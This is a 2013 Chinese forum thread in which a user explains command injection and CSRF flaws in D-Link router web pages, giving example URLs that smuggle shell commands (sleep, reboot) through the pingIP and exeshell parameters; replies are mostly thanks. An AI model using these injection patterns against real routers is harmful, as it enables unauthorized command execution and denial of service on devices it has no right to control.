设为首页收藏本站language 语言切换
开启辅助访问 切换到宽版

鸿鹄论坛

 找回密码
 论坛注册

QQ登录

先注册再绑定QQ

鸿鹄论坛»鸿鹄论坛 ≡□≡技术专题≡□≡ 网络管理 屌丝浅谈路由器漏洞挖掘
返回列表 发新帖
查看: 2194|回复: 8
收起左侧

屌丝浅谈路由器漏洞挖掘

[复制链接]
卡卡520
发表于 2013-6-26 12:08:39 | 显示全部楼层 |阅读模式
下边来个实例 D-LINK的…。    比如说 ping测试,可以被系统直接调用,和输出,但这里木有过滤http://192.168.0.1/tools_vct.php?pingIP=192.168.0.1我们可以用这种姿势插入比如说让路由器进入休眠状态,后入!后入30个休眠命令http://192.168.0.1/tools_vct.php?pingIP=127.0.0.1%3B%20sleep,2030%其中要加入个空格,转成20% ,很多时候做路由渗透测试,没有进行转义,导致没有执行成功就以为没有洞…。我就因此错过了几个,虽然后边自己也发现了,所以在这提醒一下大家  :D睡前再来条黄瓜吧,这条黄瓜就是http://192.168.0.1/tools_system.php它能够重启路由器,也就是能被系统直接调用,后来我们在路由器固件里发现了利用的js http://192.168.0.1/sys_config_valid.xgi?exeshell=submit%20REBOOT唉,就像是csrf+远程命令执行exeshell是一个非常淫荡的变量名还可以这样继续插入,啪啪啪,路由器休眠了http://192.168.0.1/sys_config_valid.xgi?exeshell =%60sleep 30%60呵呵,你又开始鄙视我了         屌丝黄昏,你除了会关我路由器你还能干吗?你除了会啪啪啪还会什么?
屌丝浅谈路由器漏洞挖掘.pdf (154.78 KB, 下载次数: 51)
路由器

相关帖子
回复

使用道具 举报

peter123
发表于 2013-6-28 12:42:30 | 显示全部楼层
沙发 2013-6-28 12:42:30 回复 收起回复
回复 支持 反对

使用道具 举报

tengjian
发表于 2013-6-28 16:11:22 | 显示全部楼层
感谢分享!你知道的太多了,主要就是web端做的太次,如果没有web端,估计就没戏了
板凳 2013-6-28 16:11:22 回复 收起回复
回复 支持 反对

使用道具 举报

mrzx
发表于 2013-7-1 11:51:39 | 显示全部楼层
我在想,如果我把web服务和80端口给关闭了。。。。这套就不管用了吧。。
地板 2013-7-1 11:51:39 回复 收起回复
回复 支持 反对

使用道具 举报

QQ285486507
发表于 2013-7-1 20:55:50 | 显示全部楼层
5# 2013-7-1 20:55:50 回复 收起回复
回复 支持 反对

使用道具 举报

溯流而
发表于 2013-7-4 14:36:43 | 显示全部楼层
6# 2013-7-4 14:36:43 回复 收起回复
回复 支持 反对

使用道具 举报

飛尐
发表于 2013-7-11 10:28:44 | 显示全部楼层
7# 2013-7-11 10:28:44 回复 收起回复
回复 支持 反对

使用道具 举报

seczip
发表于 2013-7-30 15:38:41 | 显示全部楼层
hao
8# 2013-7-30 15:38:41 回复 收起回复
回复 支持 反对

使用道具 举报

Luce
发表于 2013-9-5 23:02:33 | 显示全部楼层
楼楼 你知道的太多了
9# 2013-9-5 23:02:33 回复 收起回复
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 论坛注册

本版积分规则

QQ|Archiver|手机版|小黑屋|sitemap|鸿鹄论坛 ( 京ICP备14027439号 )  

GMT+8, 2025-2-13 02:02 , Processed in 0.083496 second(s), 26 queries , Redis On.  

  Powered by Discuz!

  © 2001-2025 HH010.COM

快速回复 返回顶部 返回列表